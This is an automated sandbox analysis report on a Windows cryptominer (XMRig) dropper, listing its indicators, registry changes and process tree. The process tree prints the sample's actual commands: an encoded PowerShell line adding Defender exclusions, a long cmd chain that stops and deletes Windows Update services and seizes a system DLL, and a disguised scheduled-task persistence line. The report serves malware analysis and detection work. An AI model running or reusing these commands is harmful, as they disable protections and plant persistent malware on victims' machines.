Analysis
-
max time kernel
89s -
max time network
73s -
platform
windows10_x64 -
resource
win10-20220414-en -
submitted
18-05-2022 21:09
Static task
static1
General
-
Target
003bf16a4661cccc90dd7410ab077d356a3d434effe1047a6df1c133b1746b33.exe
-
Size
4.1MB
-
MD5
c1fd183c8ef30db8e2be4ab51e42501f
-
SHA1
67a5ba161cafa7f0471f03968dd0f94cfb21aa1a
-
SHA256
003bf16a4661cccc90dd7410ab077d356a3d434effe1047a6df1c133b1746b33
-
SHA512
8b3060ae4c8e8e7f376ed40ac9741206f9d82f3185571a4edd2be05de5240ae743356cd498a842f58f969286e80014ecae29423a618b520d97cedc5a01ddc2f0
Malware Config
Signatures
-
Modifies security service 2 TTPs 5 IoCs
Processes:
reg.exedescription ioc process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo reg.exe -
XMRig Miner Payload 5 IoCs
Processes:
resource yara_rule behavioral1/memory/5116-387-0x000000014036DB84-mapping.dmp xmrig behavioral1/memory/5116-386-0x0000000140000000-0x0000000140803000-memory.dmp xmrig behavioral1/memory/5116-389-0x0000000140000000-0x0000000140803000-memory.dmp xmrig behavioral1/memory/5116-390-0x0000000140000000-0x0000000140803000-memory.dmp xmrig behavioral1/memory/5116-392-0x0000000140000000-0x0000000140803000-memory.dmp xmrig -
Executes dropped EXE 1 IoCs
Processes:
updater.exepid process 8 updater.exe -
Possible privilege escalation attempt 4 IoCs
Processes:
takeown.exeicacls.exetakeown.exeicacls.exepid process 4100 takeown.exe 3468 icacls.exe 4584 takeown.exe 4896 icacls.exe -
Stops running service(s) 3 TTPs
-
Modifies file permissions 1 TTPs 4 IoCs
Processes:
takeown.exeicacls.exetakeown.exeicacls.exepid process 4100 takeown.exe 3468 icacls.exe 4584 takeown.exe 4896 icacls.exe -
Drops file in System32 directory 3 IoCs
Processes:
powershell.execonhost.exedescription ioc process File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.log conhost.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe -
Suspicious use of SetThreadContext 2 IoCs
Processes:
conhost.exedescription pid process target process PID 976 set thread context of 356 976 conhost.exe conhost.exe PID 976 set thread context of 5116 976 conhost.exe explorer.exe -
Drops file in Program Files directory 3 IoCs
Processes:
conhost.execonhost.exedescription ioc process File created C:\Program Files\Chrome\updater.exe conhost.exe File opened for modification C:\Program Files\Chrome\updater.exe conhost.exe File created C:\Program Files\Google\Libs\WR64.sys conhost.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Modifies data under HKEY_USERS 56 IoCs
Processes:
conhost.exepowershell.exeexplorer.exedescription ioc process Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" conhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT explorer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs explorer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ conhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs explorer.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" conhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates explorer.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" conhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" conhost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe -
Modifies registry key 1 TTPs 18 IoCs
Processes:
reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exepid process 4608 reg.exe 2168 reg.exe 4592 reg.exe 4600 reg.exe 2700 reg.exe 4864 reg.exe 4960 reg.exe 1580 reg.exe 4132 reg.exe 4628 reg.exe 3808 reg.exe 4944 reg.exe 2948 reg.exe 4988 reg.exe 5112 reg.exe 1716 reg.exe 4556 reg.exe 5020 reg.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.execonhost.exepowershell.execonhost.exeexplorer.exepid process 3496 powershell.exe 3496 powershell.exe 3496 powershell.exe 2132 conhost.exe 1840 powershell.exe 1840 powershell.exe 1840 powershell.exe 976 conhost.exe 5116 explorer.exe 5116 explorer.exe 5116 explorer.exe 5116 explorer.exe 5116 explorer.exe 5116 explorer.exe 5116 explorer.exe 5116 explorer.exe 5116 explorer.exe 5116 explorer.exe 5116 explorer.exe 5116 explorer.exe 5116 explorer.exe 5116 explorer.exe 5116 explorer.exe 5116 explorer.exe 5116 explorer.exe 5116 explorer.exe 5116 explorer.exe 5116 explorer.exe 5116 explorer.exe 5116 explorer.exe 5116 explorer.exe 5116 explorer.exe 5116 explorer.exe 5116 explorer.exe 5116 explorer.exe 5116 explorer.exe 5116 explorer.exe 5116 explorer.exe 5116 explorer.exe 5116 explorer.exe 5116 explorer.exe 5116 explorer.exe 5116 explorer.exe 5116 explorer.exe 5116 explorer.exe 5116 explorer.exe 5116 explorer.exe 5116 explorer.exe 5116 explorer.exe 5116 explorer.exe 5116 explorer.exe 5116 explorer.exe 5116 explorer.exe 5116 explorer.exe 5116 explorer.exe 5116 explorer.exe 5116 explorer.exe 5116 explorer.exe 5116 explorer.exe 5116 explorer.exe 5116 explorer.exe 5116 explorer.exe 5116 explorer.exe 5116 explorer.exe -
Suspicious behavior: LoadsDriver 1 IoCs
Processes:
pid process 624 -
Suspicious use of AdjustPrivilegeToken 41 IoCs
Processes:
powershell.execonhost.exetakeown.exepowershell.execonhost.exetakeown.exeexplorer.exedescription pid process Token: SeDebugPrivilege 3496 powershell.exe Token: SeIncreaseQuotaPrivilege 3496 powershell.exe Token: SeSecurityPrivilege 3496 powershell.exe Token: SeTakeOwnershipPrivilege 3496 powershell.exe Token: SeLoadDriverPrivilege 3496 powershell.exe Token: SeSystemProfilePrivilege 3496 powershell.exe Token: SeSystemtimePrivilege 3496 powershell.exe Token: SeProfSingleProcessPrivilege 3496 powershell.exe Token: SeIncBasePriorityPrivilege 3496 powershell.exe Token: SeCreatePagefilePrivilege 3496 powershell.exe Token: SeBackupPrivilege 3496 powershell.exe Token: SeRestorePrivilege 3496 powershell.exe Token: SeShutdownPrivilege 3496 powershell.exe Token: SeDebugPrivilege 3496 powershell.exe Token: SeSystemEnvironmentPrivilege 3496 powershell.exe Token: SeRemoteShutdownPrivilege 3496 powershell.exe Token: SeUndockPrivilege 3496 powershell.exe Token: SeManageVolumePrivilege 3496 powershell.exe Token: 33 3496 powershell.exe Token: 34 3496 powershell.exe Token: 35 3496 powershell.exe Token: 36 3496 powershell.exe Token: SeDebugPrivilege 2132 conhost.exe Token: SeTakeOwnershipPrivilege 4100 takeown.exe Token: SeDebugPrivilege 1840 powershell.exe Token: SeAssignPrimaryTokenPrivilege 1840 powershell.exe Token: SeIncreaseQuotaPrivilege 1840 powershell.exe Token: SeSecurityPrivilege 1840 powershell.exe Token: SeTakeOwnershipPrivilege 1840 powershell.exe Token: SeLoadDriverPrivilege 1840 powershell.exe Token: SeSystemtimePrivilege 1840 powershell.exe Token: SeBackupPrivilege 1840 powershell.exe Token: SeRestorePrivilege 1840 powershell.exe Token: SeShutdownPrivilege 1840 powershell.exe Token: SeSystemEnvironmentPrivilege 1840 powershell.exe Token: SeUndockPrivilege 1840 powershell.exe Token: SeManageVolumePrivilege 1840 powershell.exe Token: SeDebugPrivilege 976 conhost.exe Token: SeTakeOwnershipPrivilege 4584 takeown.exe Token: SeLockMemoryPrivilege 5116 explorer.exe Token: SeLockMemoryPrivilege 5116 explorer.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
003bf16a4661cccc90dd7410ab077d356a3d434effe1047a6df1c133b1746b33.execonhost.execmd.execmd.execmd.execmd.exeupdater.exedescription pid process target process PID 2016 wrote to memory of 2132 2016 003bf16a4661cccc90dd7410ab077d356a3d434effe1047a6df1c133b1746b33.exe conhost.exe PID 2016 wrote to memory of 2132 2016 003bf16a4661cccc90dd7410ab077d356a3d434effe1047a6df1c133b1746b33.exe conhost.exe PID 2016 wrote to memory of 2132 2016 003bf16a4661cccc90dd7410ab077d356a3d434effe1047a6df1c133b1746b33.exe conhost.exe PID 2132 wrote to memory of 2688 2132 conhost.exe cmd.exe PID 2132 wrote to memory of 2688 2132 conhost.exe cmd.exe PID 2688 wrote to memory of 3496 2688 cmd.exe powershell.exe PID 2688 wrote to memory of 3496 2688 cmd.exe powershell.exe PID 2132 wrote to memory of 4948 2132 conhost.exe cmd.exe PID 2132 wrote to memory of 4948 2132 conhost.exe cmd.exe PID 4948 wrote to memory of 5028 4948 cmd.exe sc.exe PID 4948 wrote to memory of 5028 4948 cmd.exe sc.exe PID 4948 wrote to memory of 4864 4948 cmd.exe sc.exe PID 4948 wrote to memory of 4864 4948 cmd.exe sc.exe PID 4948 wrote to memory of 1260 4948 cmd.exe sc.exe PID 4948 wrote to memory of 1260 4948 cmd.exe sc.exe PID 4948 wrote to memory of 2032 4948 cmd.exe sc.exe PID 4948 wrote to memory of 2032 4948 cmd.exe sc.exe PID 4948 wrote to memory of 2796 4948 cmd.exe sc.exe PID 4948 wrote to memory of 2796 4948 cmd.exe sc.exe PID 4948 wrote to memory of 2948 4948 cmd.exe reg.exe PID 4948 wrote to memory of 2948 4948 cmd.exe reg.exe PID 4948 wrote to memory of 4960 4948 cmd.exe reg.exe PID 4948 wrote to memory of 4960 4948 cmd.exe reg.exe PID 4948 wrote to memory of 4988 4948 cmd.exe reg.exe PID 4948 wrote to memory of 4988 4948 cmd.exe reg.exe PID 4948 wrote to memory of 1580 4948 cmd.exe reg.exe PID 4948 wrote to memory of 1580 4948 cmd.exe reg.exe PID 4948 wrote to memory of 5112 4948 cmd.exe reg.exe PID 4948 wrote to memory of 5112 4948 cmd.exe reg.exe PID 4948 wrote to memory of 4100 4948 cmd.exe takeown.exe PID 4948 wrote to memory of 4100 4948 cmd.exe takeown.exe PID 4948 wrote to memory of 3468 4948 cmd.exe icacls.exe PID 4948 wrote to memory of 3468 4948 cmd.exe icacls.exe PID 2132 wrote to memory of 3520 2132 conhost.exe cmd.exe PID 2132 wrote to memory of 3520 2132 conhost.exe cmd.exe PID 3520 wrote to memory of 4848 3520 cmd.exe schtasks.exe PID 3520 wrote to memory of 4848 3520 cmd.exe schtasks.exe PID 4948 wrote to memory of 4132 4948 cmd.exe reg.exe PID 4948 wrote to memory of 4132 4948 cmd.exe reg.exe PID 4948 wrote to memory of 1716 4948 cmd.exe reg.exe PID 4948 wrote to memory of 1716 4948 cmd.exe reg.exe PID 4948 wrote to memory of 4628 4948 cmd.exe reg.exe PID 4948 wrote to memory of 4628 4948 cmd.exe reg.exe PID 4948 wrote to memory of 4608 4948 cmd.exe reg.exe PID 4948 wrote to memory of 4608 4948 cmd.exe reg.exe PID 4948 wrote to memory of 3944 4948 cmd.exe schtasks.exe PID 4948 wrote to memory of 3944 4948 cmd.exe schtasks.exe PID 4948 wrote to memory of 3912 4948 cmd.exe schtasks.exe PID 4948 wrote to memory of 3912 4948 cmd.exe schtasks.exe PID 4948 wrote to memory of 4224 4948 cmd.exe schtasks.exe PID 4948 wrote to memory of 4224 4948 cmd.exe schtasks.exe PID 4948 wrote to memory of 3784 4948 cmd.exe schtasks.exe PID 4948 wrote to memory of 3784 4948 cmd.exe schtasks.exe PID 4948 wrote to memory of 3780 4948 cmd.exe schtasks.exe PID 4948 wrote to memory of 3780 4948 cmd.exe schtasks.exe PID 4948 wrote to memory of 3032 4948 cmd.exe schtasks.exe PID 4948 wrote to memory of 3032 4948 cmd.exe schtasks.exe PID 4948 wrote to memory of 2084 4948 cmd.exe schtasks.exe PID 4948 wrote to memory of 2084 4948 cmd.exe schtasks.exe PID 2132 wrote to memory of 3192 2132 conhost.exe cmd.exe PID 2132 wrote to memory of 3192 2132 conhost.exe cmd.exe PID 3192 wrote to memory of 4280 3192 cmd.exe schtasks.exe PID 3192 wrote to memory of 4280 3192 cmd.exe schtasks.exe PID 8 wrote to memory of 976 8 updater.exe conhost.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\003bf16a4661cccc90dd7410ab077d356a3d434effe1047a6df1c133b1746b33.exe"C:\Users\Admin\AppData\Local\Temp\003bf16a4661cccc90dd7410ab077d356a3d434effe1047a6df1c133b1746b33.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\003bf16a4661cccc90dd7410ab077d356a3d434effe1047a6df1c133b1746b33.exe"2⤵
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAHUAYwBjACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAbAB6AHEAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAaQB5AHMAZAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBjAGgAaQAjAD4A"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -EncodedCommand "PAAjAHUAYwBjACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAbAB6AHEAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAaQB5AHMAZAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBjAGgAaQAjAD4A"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\sc.exesc stop UsoSvc4⤵
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc4⤵
-
C:\Windows\system32\sc.exesc stop wuauserv4⤵
-
C:\Windows\system32\sc.exesc stop bits4⤵
-
C:\Windows\system32\sc.exesc stop dosvc4⤵
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f4⤵
- Modifies security service
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\WaaSMedicSvc.dll4⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE4⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr '^"C:\Program Files\Chrome\updater.exe^"'3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr '"C:\Program Files\Chrome\updater.exe"'4⤵
- Creates scheduled task(s)
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c schtasks /run /tn "GoogleUpdateTaskMachineQC"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /run /tn "GoogleUpdateTaskMachineQC"4⤵
-
C:\Program Files\Chrome\updater.exe"C:\Program Files\Chrome\updater.exe"1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Program Files\Chrome\updater.exe"2⤵
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAHUAYwBjACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAbAB6AHEAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAaQB5AHMAZAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBjAGgAaQAjAD4A"3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -EncodedCommand "PAAjAHUAYwBjACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAbAB6AHEAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAaQB5AHMAZAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBjAGgAaQAjAD4A"4⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add 